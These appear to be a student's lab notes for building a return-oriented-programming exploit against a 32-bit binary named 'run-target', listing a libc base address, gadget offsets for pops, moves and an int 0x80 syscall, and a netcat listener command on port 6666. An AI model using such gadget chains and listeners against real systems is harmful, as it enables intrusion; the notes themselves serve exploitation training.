########################
Calls for quick access

./run-target 1 2452
nc -l -p 6666
########################
Useful Gadgets

Base libc address: 0xbba73000

0x000286e5 (BBA9 B6E5): int 0x80; ret;-------
- traps and calls ret
- allows system calls

0x001270e1 (BBB9 A0E1): pop eax; ret;-----------
0x0012ac1b (BBB9 DC1B): pop edx; ret; 
0x00137422 (BBBA A422): pop ecx; ret; 
- pops a value off the stack onto register
- use to make a syscall

0x000283c2 (BBA9 B3C2): xor eax, eax; ret;---------
0x000c8ed4 (BBB3 BED4): xor edx, edx; ret;---------
- xor registers together to get zero

0x000dfd88: mov dword ptr [eax], edx; ret;---------
- move edx to where eax is pointing

0x000dfd79: mov dword ptr [edx], eax; ret;---------
- move eax to where edx points to

0x000f887e: mov dword ptr [ecx], edx; ret; 
- moves edx to where ecx is pointing

0x00060b42: mov eax, ecx; ret;-----------
0x000c54c0: mov eax, edx; ret;---------- 
- move ecx or edx into eax


0x00141607 (BBBB 4607): add al, dl; ret;-------------
- add lower 8 of edx to al
0x00008dd7 (BBA7 BDD7): add ah, cl; ret;
- add lower 8 of ecx to ah

0x0010888a (BBB7 B88A): inc edx; ret;

0x0010df07 (BBB8 0F07): dec dword ptr [ecx]; ret;
- decrement where ecx points to